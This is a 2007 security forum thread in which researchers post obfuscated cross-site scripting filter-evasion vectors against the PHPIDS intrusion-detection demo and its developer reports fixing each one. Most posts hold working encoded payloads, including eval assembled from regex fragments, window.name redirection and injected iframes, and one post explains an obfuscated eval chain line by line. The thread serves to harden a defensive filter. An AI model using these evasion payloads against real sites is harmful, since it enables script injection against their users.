InternetExplorer "javascript/vbscript" aliases

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Mon, 09 Jul 2007 16:09:45 -0500

Hi!

The mysterious y is a relic from when we had lots of false positives by the yahoo page slurp spider - and since no critical JS function matches the pattern y\w+ we just fixed the issue that way.

The location=name vector is evil - i hate the self contained stuff via name because it's almost undetectable. I mean okay - you can detect location[^\w\s]\n*name but that would just catch the un-obfuscated ones.

Have to think about that...

Greetings,
.mario

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Mon, 09 Jul 2007 14:55:17 -0500

kishord Wrote:
-------------------------------------------------------
> a=alert
> a(0)
>
> This harmless vector is still alive

Speaking of super-simple stuff, this not so harmless one is too:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=location=name***content,post

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Mon, 09 Jul 2007 14:34:53 -0500

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Mon, 09 Jul 2007 13:59:06 -0500

That little.. ******* ;) Thx kishord - almost forgot it!

Re: InternetExplorer "javascript/vbscript" aliases

kishord — Mon, 09 Jul 2007 13:50:46 -0500

a=alert
a(0)

This harmless vector is still alive

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Mon, 09 Jul 2007 10:32:15 -0500

@.mario:
Since you're not satisfied yet with PHPIDS' newline attacks detection, one-liner here for fairness sake :)

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=b%3Dtop%2Ca%3D/loc/%20.%20source%2Ca%2B%3D/ation/%20.%20source%2Cb%5Ba%3Da%5D%20%3D%20name***content,

BTW, if anyone is interested I've just generalized name.xss for general consumption. Here's a "man page"

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Mon, 09 Jul 2007 10:09:59 -0500

@ma1: fixed and fixed

Re: InternetExplorer "javascript/vbscript" aliases

Ivan — Mon, 09 Jul 2007 09:12:52 -0500

Ronald wrote:

"Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyones reaction upon it, since I already use this method for over a year now."

I agree with this, on some mine project I only block mentioned chars (' " < >), all anothers are allowed and properly handled with application logic.

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Mon, 09 Jul 2007 06:44:32 -0500

Vector of the day:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a=/ev///%0a.source%0aa%2b=/al///%0a.source%0aa%5ba%5d%20%28name%29***content

Slight variation:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a%3D/ev/%20%0A.source%0Aa%2B%3D/al/%20%0A.source%2Ca%20%3D%20a%5Ba%5D%0Aa%28name%29***content

Cheers

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Mon, 09 Jul 2007 04:12:27 -0500

@all,@ma1: Nice ones aaand fixed ;) As already posted in the group the timed out one is pretty neat!

@Ronald: Yep - I guess we'll have to discuss that with christ1an and lars too but it thinks it's no bad idea. Let's chitchat later about the PHPIDS for PHP4 if you like. We are planning to release 0.3 an thursday and would be a nice feature to have this version aboard.

Greetings,
.mario

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Sun, 08 Jul 2007 22:06:29 -0500

@.mario

clearly it's impossible to detect everything with RegExes alone, that is exactly why I block single chars like: ' " < > on the request uri in my .htaccess, cause they never happen, I have a few more but those are only for my site.

So like you proposed, I guess it would be a very good idea to have a triage upon such datasets. The previous examples are nice and all, but pretty useless to launch an sensible attack, Only a few characters that should be detect upon every instance.

Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyones reaction upon it, since I already use this method for over a year now.

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Sun, 08 Jul 2007 21:56:40 -0500

ma1 Wrote:
-------------------------------------------------------
> .mario Wrote:
> --------------------------------------------------
> -----
> > @Ronald: I agree when talking about GET
> Requests.
>
> So these are all illegal, right?
>
> http://en.wikipedia.org/wiki/Heroes_(TV_series%29
>
> http://kb.mozillazine.org/Label%3D%22%26blockImage
> Cmd._label%3B%22
>
> http://developer.mozilla.org/en/docs/Core_JavaScri
> pt_1.5_Reference:Global_Functions:eval
>
> And I didn't even add any query string :)
>
> As for the tilde character, ~, maybe you're too
> young to remember the time when most of the web
> URLs contained one (especially in .edu sites),
> because it's an Unix shortcut for user's home.
>
> Finally, ?param=& is quite common and legal, since
> it's sent every time an optional field is left
> empty in a form.

Yeah that's why Wikipedia sucks as an example because they work in a very different way by using a meta language, so that doesn't really counts. I mean in "normal" queries I never seen those chars, some do sure. But the only ones I use are pipes or spaces, which are pretty standard in developing. The rest I detect upon. While this said the quote set: ' " and less/greater signs > < without them (and illegal btw) it's is nearly impossible to construct a good injection, the rest is refinement upon them.

So when you detect them, you are half the way.

Oh yeah I'm way too old to remember the tilde ~
my first homepage had one, I'm close to 30 now, so I know this was a special reference character back then.

Just like: < > ' " chars are, ever saw one in a normal query?

Yeah, I know why I love standards, standards in developing just because of this mayhem alone.

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Sun, 08 Jul 2007 17:40:41 -0500

@.mario:
wow, that's been fast.
Starting to pant, like SDC :)

This one is still cross-browser, with some "bouncing":

http://hackademix.net/name.xss/http://demo.php-ids.org/?test=setTimeout//%0D%0A%28name//%0D%0A,0%29///payloadId=1

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Sun, 08 Jul 2007 06:58:43 -0500

It's a pity XML predicates don't work in IE :(

This one is cross-browser, though:
http://demo.php-ids.org/?test=%24_%3Ddocument%2C%24__%3D%24_.URL%2C%24___%3Dunescape%2C%24_%3D%24_.body%2C%24_.innerHTML%20%3D%20%24___(http%3D%24__)#%3Ciframe%20src%3D%22javascript%3Atop.document.body.firstChild.nodeValue%3D''%2Calert('PWND%20%3A)')%22%3E%3C%2Fiframe%3E%3Cdiv%20style%3D'text-align%3A%20center%3B%20background%3A%20yellow'%3E%3Ch2%3EPWND%20by%20ma1%3C%2Fh2%3E%3Ca%20href%3D'http%3A%2F%2Fnoscript.net'%3EThere's%20a%20browser%20safer%20than%20Firefox...%20it's%20Firefox%2C%20with%20NoScript%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fbody%3E%3C%2Fhtml%3E

Have a nice Sunday :)

Re: InternetExplorer "javascript/vbscript" aliases

Martin — Sun, 08 Jul 2007 05:15:58 -0500

Totally evil - awesome vector SDC!

Re: InternetExplorer "javascript/vbscript" aliases

kishord — Sat, 07 Jul 2007 23:10:18 -0500

Wow!

That was unexpected and I am speechless!

Re: InternetExplorer "javascript/vbscript" aliases

sirdarckcat — Sat, 07 Jul 2007 08:29:11 -0500

Hi!

Today I'll introduce the use of XML Predicates in JavaScript to the
vectors.

I was trying to leave this to the end, but..

http://demo.php-ids.org/?test=y%3D%3Ca%3Ealert%3C/a%20%3E%3Bcontent%5By%5D%28123%29

The code:
y=alert;content[y](123)

The XML Predicate:
y=alert;

I'm running out of ideas :P, this filter is a pretty hard obstacle to
any attacker, congratulations mario :D

Greetz!!

PS. content=window
JavasCrypt rulz :P

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Sat, 07 Jul 2007 04:45:17 -0500

http://demo.php-ids.org/?test=%24%3Ddocument%2C%24%3D%24.URL%2C%24%24%3Dunescape%2C%24%24%24%3Deval%2C%24%24%24%28%24%24%28%24%29%29#%0Aalert%28%27$$$%20PECUNIA%20NON%20OLET%20$$$%27%29

... && JavasCrypt.votes++ //:)

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Sat, 07 Jul 2007 04:04:31 -0500

@Kishord: Thanks for the explanation - JavaSCrypt matches the properties of that vector ;) I was also thinking about 'The new dawn of filter evasion' :D

Greetings,
.mario

Re: InternetExplorer "javascript/vbscript" aliases

kishord — Sat, 07 Jul 2007 01:25:28 -0500

@Mario

Hi, Here is an explanation of the vector:

evil=/ev/.source+/al/.source
//---variable evil now contains string 'eval'

changeProto=/Strin/.source+
/g.prototyp/.source+
/e.ss=/.source+
/Strin/.source+
/g.prototyp/.source+
/e.substrin/.source+
/g/.source;

//--- changeProto now contains string 'String.prototype.ss=String.prototype.substring'
// Thus now ss is same as substring for any string

hashCod=/documen/.source+
/t.locatio/.source+
/n.has/.source+
/h/.source;

// hashCod now contains string 'document.location.hash'

7[evil](changeProto);
// In turn, the statement above executes eval(changeProto)

hash=7[evil](hashCod);

// In turn, the statement above executes hash=eval(hashCod)
// Thus hashCod now holds a string "#alert('Kishor Was Here!')"

cod=hash.ss(1);

// Since we added ss to String class, cod becomes = "alert('Kishor Was Here!')"

7[evil](cod);
// We use the eval to evaluate cod

In the link of the POC I needed to rename several things e.g. hash to hsh

Hope it was simple ;)

@Mario
When you write all this up, consider using word 'JavasCrypt' in the title
if it doesn't sound like a bad idea.

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Fri, 06 Jul 2007 17:10:39 -0500

http://www.ietf.org/rfc/rfc1738.txt
http://www.ietf.org/rfc/rfc1808.txt
http://gbiv.com/protocols/uri/rfc/rfc3986.html#collected-abnf

K - I agree.

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Fri, 06 Jul 2007 16:50:44 -0500

.mario Wrote:
-------------------------------------------------------
> @Ronald: I agree when talking about GET Requests.

So these are all illegal, right?

http://en.wikipedia.org/wiki/Heroes_(TV_series%29

http://kb.mozillazine.org/Label%3D%22%26blockImageCmd._label%3B%22

http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Functions:eval

And I didn't even add any query string :)

As for the tilde character, ~, maybe you're too young to remember the time when most of the web URLs contained one (especially in .edu sites), because it's an Unix shortcut for user's home.

Finally, ?param=& is quite common and legal, since it's sent every time an optional field is left empty in a form.

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Fri, 06 Jul 2007 16:31:05 -0500

@all: nice ones again... and fixed :)

@Kishord: Wow. I'm speechless. What is that?

@Ronald: I agree when talking about GET Requests. Maybe we should consider doing a before-filter validation when the request type is GET to add initial impact when spiced with illegal characters.

Grx
.mario

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Fri, 06 Jul 2007 16:04:08 -0500

Ronald Wrote:
-------------------------------------------------------
> This is exactly what I meant:
> http://demo.php-ids.org/?test=___%3D1%3F%27ert%281
> 23%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27
> ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29
>
> This will never happen in a legitimate query and
> thereby this can be detected very quickly with all
> combinations of: ( = , ' " : ( ) [ ])
>
> I personally never saw a queries like this, did
> you?

I can't see anything illegal in that query, it's all urlencoded:
test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

BTW, if I was an admin of this board, I would obviously see a lot of legitimate HTTP requests like that, especially in the traffic related to the "So it begins" thread.

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Fri, 06 Jul 2007 15:40:52 -0500

This is exactly what I meant:
http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

This will never happen in a legitimate query and thereby this can be detected very quickly with all combinations of: ( = , ' " : ( ) [ ])

I personally never saw a queries like this, did you?

index.php?id=' // illegal
index.php?id=f=b // illegal
index.php?id=( // illegal
index.php?id=< // illegal
index.php?id=> // illegal
index.php?id=^ // illegal
index.php?id=& // illegal
index.php?id=$ // illegal
index.php?id=~ // illegal
index.php?id=` // illegal

Know why? because they are unsafe chars and should be detected in the first IDS round, because they are used to pentest a system first in order to refine the injection later.

Re: InternetExplorer "javascript/vbscript" aliases

ma1 — Fri, 06 Jul 2007 15:34:46 -0500

kishord Wrote:
-------------------------------------------------------
> > Kishor Was Here!
>
> Hmmm, looks like once you are inside script tag,
> you rule the world!

Oh yeah!

Disclaimer & credits: original disclosure and flattering proof of concept courtesy of elio
Warning: if you use NoScript, you'll need to allow a ton of assorted junk, included google analytics: the first ad-sponsored XSS? :D

Re: InternetExplorer "javascript/vbscript" aliases

sirdarckcat — Fri, 06 Jul 2007 13:18:03 -0500

Interesting, RegExp.source :P

here is an incomplete vector, I didn't had time to implement into the "location" way..

http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

anyway it shows an alert :P

Greetz!!

Re: InternetExplorer "javascript/vbscript" aliases

kishord — Fri, 06 Jul 2007 12:43:25 -0500

Kishor Was Here!

Hmmm, looks like once you are inside script tag, you rule the world!

Re: InternetExplorer "javascript/vbscript" aliases

Anonymous User — Fri, 06 Jul 2007 09:26:43 -0500

@ma1: Fixed

Re: InternetExplorer "javascript/vbscript" aliases

thornmaker — Fri, 06 Jul 2007 09:09:10 -0500

thanks sirdarckcat :) I got that one before .mario did! and quite a clever one too